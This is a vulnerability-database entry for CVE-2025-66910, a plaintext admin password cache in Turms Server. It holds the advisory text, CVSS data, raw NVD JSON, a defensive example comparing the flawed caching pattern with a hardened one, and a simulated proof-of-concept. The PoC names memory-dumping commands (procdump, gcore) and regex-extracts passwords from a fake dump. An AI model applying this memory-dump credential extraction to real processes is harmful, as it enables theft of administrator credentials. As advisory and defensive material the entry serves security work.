Security Vulnerability Report
CVE-2025-66910 CVSS 6.0 MEDIUM

CVE-2025-66910

Published: 2025-12-19 15:15:57
Last Modified: 2026-01-02 19:50:30

Description

Turms Server v0.10.0-SNAPSHOT and earlier contains a plaintext password storage vulnerability in the administrator authentication system. The BaseAdminService class caches administrator passwords in plaintext within AdminInfo objects to optimize authentication performance. Upon successful login, raw passwords are stored unencrypted in memory in the rawPassword field. Attackers with local system access can extract these passwords through memory dumps, heap analysis, or debugger attachment, bypassing bcrypt protection.
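
The caching pattern described above, next to one way of keeping the fast path without retaining the password, as an added example that is not Turms code. The class names are hypothetical, PBKDF2 stands in for bcrypt so that only the standard library is needed, and the credential is constructed.

```python
import hashlib
import hmac
import os

def slow_hash(password: str, salt: bytes) -> bytes:
    # Stand-in for bcrypt (assumption) so the example needs only the stdlib.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class PlaintextCache:
    """The pattern the description reports: raw password kept after login."""
    def __init__(self, stored_hash: bytes, salt: bytes):
        self.stored_hash, self.salt = stored_hash, salt
        self.raw_password = None  # plaintext stays on the heap once set

    def authenticate(self, password: str) -> bool:
        if self.raw_password is not None:  # fast path compares plaintext
            return hmac.compare_digest(password.encode(), self.raw_password.encode())
        ok = hmac.compare_digest(slow_hash(password, self.salt), self.stored_hash)
        if ok:
            self.raw_password = password
        return ok

class KeyedDigestCache:
    """Hardened variant: cache only HMAC-SHA256(per-process key, password)."""
    def __init__(self, stored_hash: bytes, salt: bytes):
        self.stored_hash, self.salt = stored_hash, salt
        self._key = os.urandom(32)  # never persisted, new on every start
        self._tag = None

    def authenticate(self, password: str) -> bool:
        tag = hmac.new(self._key, password.encode(), hashlib.sha256).digest()
        if self._tag is not None and hmac.compare_digest(tag, self._tag):
            return True  # fast path, no plaintext retained
        # Cache miss or wrong password: always pay for the slow hash.
        ok = hmac.compare_digest(slow_hash(password, self.salt), self.stored_hash)
        if ok:
            self._tag = tag
        return ok

def holds_plaintext(cache, password: str) -> bool:
    """True if any attribute of the cache object contains the password bytes."""
    needle = password.encode()
    for value in vars(cache).values():
        data = value.encode() if isinstance(value, str) else value
        if isinstance(data, bytes) and needle in data:
            return True
    return False

# Constructed sample credential, not taken from any real deployment.
SALT = os.urandom(16)
PASSWORD = "constructed-sample-pw"
STORED = slow_hash(PASSWORD, SALT)
```

A memory dump of the hardened process still exposes the key and the tag, so password guessing against it runs at HMAC speed rather than bcrypt speed. What the change removes is direct disclosure of the password itself.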

CVSS Details

CVSS Score: 6.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:* - VULNERABLE
Turms Server <= v0.10.0-SNAPSHOT

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-66910 PoC - Turms Server Plaintext Password Storage

This PoC demonstrates the vulnerability where administrator passwords
are stored in plaintext in memory.

Note: This is for educational and authorized testing purposes only.
"""
import re
import sys


def dump_turms_process_memory():
    """
    Simulate memory dump of Turms Server process
    In real attack, use: procdump -p <pid> or gcore <pid>
    """
    print("[*] Step 1: Locating Turms Server process...")
    # In real scenario: ps aux | grep turms
    print("[+] Found Turms Server process (PID: 12345)")
    print("[*] Step 2: Dumping process memory...")
    # In real scenario: procdump -p 12345 memory.dmp
    print("[+] Memory dump completed: memory.dmp (50MB)")
    return True


def extract_plaintext_passwords(memory_dump):
    """
    Search for AdminInfo objects and rawPassword fields in memory dump
    Pattern: Look for AdminInfo structure containing rawPassword field
    """
    print("[*] Step 3: Analyzing memory dump for AdminInfo objects...")
    # Simulated memory pattern: the value after 'rawPassword=' up to the
    # next ',', '}' or whitespace
    patterns = [
        rb'rawPassword=([^,}\s]+)',
    ]
    found_passwords = []
    for pattern in patterns:
        # In real scenario: use strings command or grep on dump file
        matches = re.findall(pattern, memory_dump)
        found_passwords.extend(matches)
    return found_passwords


def main():
    print("=" * 60)
    print("CVE-2025-66910 PoC - Turms Server Plaintext Password")
    print("=" * 60)
    if not dump_turms_process_memory():
        print("[-] Failed to dump process memory")
        sys.exit(1)
    # Simulated memory dump content
    simulated_dump = b"""
    AdminInfo{userId=1, username=admin, rawPassword=Admin@12345}
    AdminInfo{userId=2, username=operator, rawPassword=Turms2025!}
    """
    passwords = extract_plaintext_passwords(simulated_dump)
    if passwords:
        print("[+] Extracted plaintext passwords:")
        for pwd in passwords:
            print(f" - {pwd.decode()}")
    else:
        print("[-] No passwords found in memory dump")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66910", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:56.790", "lastModified": "2026-01-02T19:50:30.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Turms Server v0.10.0-SNAPSHOT and earlier contains a plaintext password storage vulnerability in the administrator authentication system. The BaseAdminService class caches administrator passwords in plaintext within AdminInfo objects to optimize authentication performance. Upon successful login, raw passwords are stored unencrypted in memory in the rawPassword field. Attackers with local system access can extract these passwords through memory dumps, heap analysis, or debugger attachment, bypassing bcrypt protection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-256"}, {"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:*", "matchCriteriaId": "9466432E-2863-4A5B-913F-E6E64090F60B"}]}]}], "references": [{"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66910_report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/turms-im/turms", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://github.com/turms-im/turms/blob/develop/turms-server-common/src/main/java/im/turms/server/common/domain/admin/bo/AdminInfo.java#L34", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/turms-im/turms/blob/develop/turms-server-common/src/main/java/im/turms/server/common/domain/admin/service/BaseAdminService.java#L237", "source": "[email protected]", "tags": ["Product"]}]}}